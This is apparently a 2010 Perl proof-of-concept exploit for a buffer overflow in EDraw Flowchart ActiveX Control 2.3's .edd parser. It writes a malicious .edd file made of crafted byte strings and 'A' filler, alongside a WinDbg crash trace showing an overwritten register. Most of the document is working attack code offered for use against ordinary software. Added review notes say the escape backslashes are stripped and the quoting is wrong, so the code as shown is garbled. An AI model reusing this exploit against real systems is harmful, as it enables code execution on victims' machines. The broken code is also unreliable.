# Title : EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
# Published : 2010-04-22
# Author : LiquidWorm
#!/usr/bin/perl
#
#
# Title: EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
#
#
# Vendor: EdrawSoft
#
# Product Web Page: http://www.edrawsoft.com
#
# Summary: Do you want to learn how to draw? Now you can online! Learn how to draw like a
# local application with Edraw Flowchart ActiveX Control that lets you quickly
# build basic flowcharts, organizational charts, business charts, hr diagram,
# work flow, programming flowchart and network diagrams.
#
# Description: EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow
# vulnerability when parsing the .edd file format, resulting in an application
# crash and a few overwritten registers, which can aid an attacker in
# executing arbitrary code.
#
# Tested On: Microsoft Windows XP Professional SP3 (EN)
#
# Version Tested: 2.3.0.6
#
#
# Windbg:
# --------------------------------------------------------------------------------------
#
# (305c.1ee4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=027a0020 ebx=00000000 ecx=0c841000 edx=3fffff45 esi=0012f2e4 edi=41414141
# eip=10083bbd esp=0012f198 ebp=01055734 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# EDImage!DllUnregisterServer+0x5594d:
# 10083bbd 895904 mov dword ptr [ecx+4],ebx ds:0023:0c841004=????????
#
# --------------------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
#
# liquidworm gmail com
#
#
#
# 20.04.2010
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4935.php
#
#
# Three byte strings that are concatenated into the generated .edd file: a
# leading chunk ($pqbdpq), a filler ($dpqpqb) and a trailing chunk ($qpdbqp).
# NOTE(review): every escape on these lines reads "x00" rather than "\x00"; the
# leading backslashes look stripped by the page extraction, so as pasted the
# script emits the ASCII text of the escapes, not the binary bytes the header
# describes — confirm against the original before relying on the output file.
$pqbdpq = "x00x0Cx00x00x00x00x00x00x00x33x73x46x44x1Fx55x8Cx44x00".
"x00x3Dx43x00x00x3Dx43x00x00x3Dx43x00x00x3Dx43x00x00x80".
"x3FxFFxFFxFFxFFxFFx90x99xAExFFx6Cx72x82x02x00x00x00x01".
"x00x00x00xFFxFFx00x03xFFx22x37xEAx01x00x00x00xFFxADxD8".
"xE6x02x00x00x00x00x00x00x00x00x00x80x3Fx02x00x00x00x01".
"x00x00x00xFFxF4x00x00x00x00x00x00x00x00x42x43x1FxF5xA3".
"x44x33x73x46x44x00x00xA0x40x33xB3x75x44x00x00x42x43x00".
"x00xA0x40x1Fx55x8Cx44x00x00x3Dx43x00x00x3Dx43x33x73x46".
"x44x1Fx55x8Cx44x00x01x00xFFxFFx00x00x06x00x43x53x52x65".
"x63x74x01x00x00xA8x2Cx02x00x00x00x00x00x00x01x00x00x00".
"x00x00x00x00x55x01x00x00xD7x01x00x00xDCx01x00x00x76x02".
"x00x00x00x00xAEx43x00x00xFBx43x00x00xEAx43x00x80x1Bx44".
"x00x00xCCx43x00x80x1Bx44x00x00x80x3Fx00x00x80x3Fx00x00".
"x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00x80x3F".
"x00x00xF0x42x00x00xF0x42x00x00x00x00x00x00x00x00x00x00".
"xCCx43x00x80x0Cx44x08x00x00x00x06x43x53x52x65x63x74x00".
"x00x00x80x3Fx00x00x00x00x00x06x31x30x30x31x2Cx32x00xFF".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x80x3Fx00x00x00x00xFExFFxFFxFFxFFxFFxFFxFFxFFx00x00x00".
"xFFx00x00x00x00x00x80x3Fx01x00x00x00x00x00x00x00xFFx00".
"x00x00x00x02x00x00x00x00x00x00x00x02x00x00x00x00x00x00".
"x00xFFx02x00x00x00xFExFFxFFxFFxFFx00x00x00xFFxFFxFFxFF".
"x00x00x01x00xFFxFFx00x00x08x00x43x54x65x78x74x4Fx62x6A".
"x00x00x01x20x2Dx02x00x00x00x00x00x00x00x00x00x02x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x20x44x00x00x20x44x00x00x3Ex44x00x00x3Ex44x00x00".
"x2Fx44x00x00x3Ex44x00x00x80x3Fx00x00x80x3Fx00x00x80x3F".
"x00x00x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00x80x3Fx00x00".
"xE6x42x00x00xE6x42x00x00x00x00x00x00x00x00x00x00xCCx43".
"x00x80x0Cx44x00x00x00x00x08x43x54x65x78x74x4Fx62x6Ax00".
"x00x00x00x00x00x00x00x00x00x00x00xFFx00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x80x3Fx00x00x00x00".
"xFExFFxFFxFFxFFxFFxFFxFFxFFx00x00x00xFFxFFxFFxFFx00x00".
"x80x3Fx01x00x00x00x00x00x00x00xFFx00x00x00x00x02x00x00".
"x00x00x00x00x00x02x00x00x00x00x00x00x00xFFx02x00x00x00".
"xFExFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx00x00x00x00x00x00".
"x00x00x10x00x00x00x00x00x00x00xCCx43x00x40xFCx43x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x40xAFx43x00x40".
"xFCx43x01x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00xCCx43x00x40xFCx43x01x00x00x00x20x00".
"x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00xC0xE8x43".
"x00x40xFCx43x01x00x00x00x20x00x00x00x00x00x00x00x00x00".
"x00x00x04x00x00x00x00xC0xE8x43x00x80x0Cx44x01x00x00x00".
"x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00";
# Trailing chunk; written to the file after the filler.
$qpdbqp = "xC0xE8x43x00xE0x1Ax44x01x00x00x00x20x00x00x00x00x00x00".
"x00x00x00x00x00x04x00x00x00x00x00xCCx43x00xE0x1Ax44x01".
"x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00".
"x00x00x40xAFx43x00xE0x1Ax44x01x00x00x00x20x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00x00x40xAFx43x00x80x0C".
"x44x01x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00x04".
"x00x00x00x00x00xCCx43x00xC0xEFx43x01x00x00x00x40x00x00".
"x00x00x00x00x00x00x00x00x00x04x00x00x00x00x00xCCx43x00".
"x80x0Cx44x03x00x00x00x01x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x34x25x0Dx10xFFx00x00x00".
"xFFxFFxFFx00x02x00x00x00x05x00x00x00x04xCBxCExCCxE5x0A".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFx05".
"x00x00x00x00x00x00xCCx43x00x00xFBx43x01x00x00xEAx43x00".
"xC0x08x44x01x00x80xE2x43x00x80x1Bx44x01x00x80xB5x43x00".
"x80x1Bx44x81x00x00xAEx43x00xC0x08x44x10x00x00x00x00x00".
"x00x00xCCx43x00x00xFBx43x00x00x00x00x00x00x00x00x05x00".
"xFFxFFx00x00x07x00x43x43x74x72x6Cx50x74x04x00x00x00x00".
"x00xCCx43x00x00xFBx43x01x00x00x00x02x00x00x00x00x00x00".
"x00x00x00x00xBFx05x80x04x00x00x00x00x00xAEx43x00xC0x08".
"x44x01x00x00x00x02x00x00x00x00x00x00xBFx00x00x00xBEx05".
"x80x04x00x00x00x00x00xEAx43x00xC0x08x44x01x00x00x00x02".
"x00x00x00x00x00x00x3Fx00x00x00xBEx05x80x04x00x00x00x00".
"x80xB5x43x00x80x1Bx44x01x00x00x00x02x00x00x00x00x00xC0".
"xBEx00x00x00x3Fx05x80x04x00x00x00x00x80xE2x43x00x80x1B".
"x44x01x00x00x00x02x00x00x00x00x00xC0x3Ex00x00x00x3Fx04".
"x00x00x00x00x00xAEx43x00x00xFBx43x01x00x00x00x20x00x00".
"x00x00x00x00x00x00x00x00x00x04x00x00x00x00x00xCCx43x00".
"x00xFBx43x01x00x00x00x20x00x00x00x00x00x00x00x00x00x00".
"x00x04x00x00x00x00x00xEAx43x00x00xFBx43x01x00x00x00x20".
"x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00x00xEA".
"x43x00x80x0Cx44x01x00x00x00x20x00x00x00x00x00x00x00x00".
"x00x00x00x04x00x00x00x00x00xEAx43x00x80x1Bx44x01x00x00".
"x00x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00x00".
"x00xCCx43x00x80x1Bx44x01x00x00x00x20x00x00x00x00x00x00".
"x00x00x00x00x00x04x00x00x00x00x00xAEx43x00x80x1Bx44x01".
"x00x00x00x20x00x00x00x00x00x00x00x00x00x00x00x04x00x00".
"x00x00x00xAEx43x00x80x0Cx44x01x00x00x00x20x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00x00x00xCCx43x00x80xEE".
"x43x01x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x04".
"x00x00x00x00x00xCCx43x00x80x0Cx44x03x00x00x00x01x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00";
# Filler: a run of "x41" escapes. The WinDbg trace in the header shows
# edi=41414141, which is consistent with this data reaching a register, though
# the exact path is not established by anything visible in this script.
$dpqpqb = "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41";
# Output file name; created relative to the current working directory.
$bppqqd = "Draw_Totally.edd";
# NOTE(review): `||` binds tighter than the comma, so this parses as
# `open edd, (">./$bppqqd" || die ...)`; the string is always true, `die` is
# unreachable, and a failed open goes unreported — the prints below would then
# write to an unopened bareword handle. This is also the 2-arg open form with a
# bareword handle that perlcritic flags; the usual idiom is
# `open my $fh, '>', "./$bppqqd" or die ...`. The "n" in the message is a "\n"
# whose backslash was lost the same way as the escapes above.
open edd, ">./$bppqqd" || die "nCan't open $bppqqd: $!";
# NOTE(review): `x 50` sits inside the double quotes, so it is interpolated as
# the literal text " x 50" after $dpqpqb; the filler appears once in the output.
# Writing this file is the script's only side effect — it performs no network
# I/O itself; the "Remote" in the title refers to the file being delivered to
# the target by other means.
print edd "$pqbdpq" . "$dpqpqb x 50" . "$qpdbqp";
# Cosmetic pause; the "n"s are again backslash-stripped newlines.
print "n ~ Buffering...n"; sleep 1;
# close is unchecked, so a buffered write error would be lost silently here.
close edd;
print "n ~ File $bppqqd ready!n";